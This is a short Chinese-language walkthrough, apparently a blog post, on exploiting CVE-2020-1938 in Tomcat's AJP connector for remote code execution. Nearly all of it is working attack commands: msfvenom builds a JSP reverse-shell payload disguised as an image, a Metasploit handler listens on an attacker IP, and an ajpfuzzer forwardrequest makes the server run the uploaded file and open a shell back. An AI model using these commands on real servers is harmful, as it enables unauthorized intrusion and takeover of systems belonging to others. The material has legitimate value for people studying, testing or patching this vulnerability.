CVE-2020-1938(RCE利用)

CVE-2020-1938(RCE利用)

1.使用msf生成反彈shell馬,並且監聽

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png

假設利用上傳點,把此圖片上傳到了目標服務器/log/shell.png。

在msf監聽:

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp

payload => java/jsp_shell_reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.223.129

lhost => 192.168.223.129

msf exploit(multi/handler) > set lport 6666

lport => 6666

msf exploit(multi/handler) >exploit

2.發送AJP包,獲取shell

使用AJP包構造工具來發送ajp包,以ajpfuzzer爲例:

運行:java -jar ajpfuzzer_v0.6.jar

連接目標端口:connect 192.168.223.1 8009

執行以下命令:

forwardrequest 2 "HTTP/1.1" "/123.jsp" 192.168.223.1 192.168.223.1 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:/","javax.servlet.include.path_info:log/shell.png","javax.servlet.include.servlet_path:/"

可以看到,請求發送成功後,shell.png被作爲jsp解析,成功獲取目標服務器的shell。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章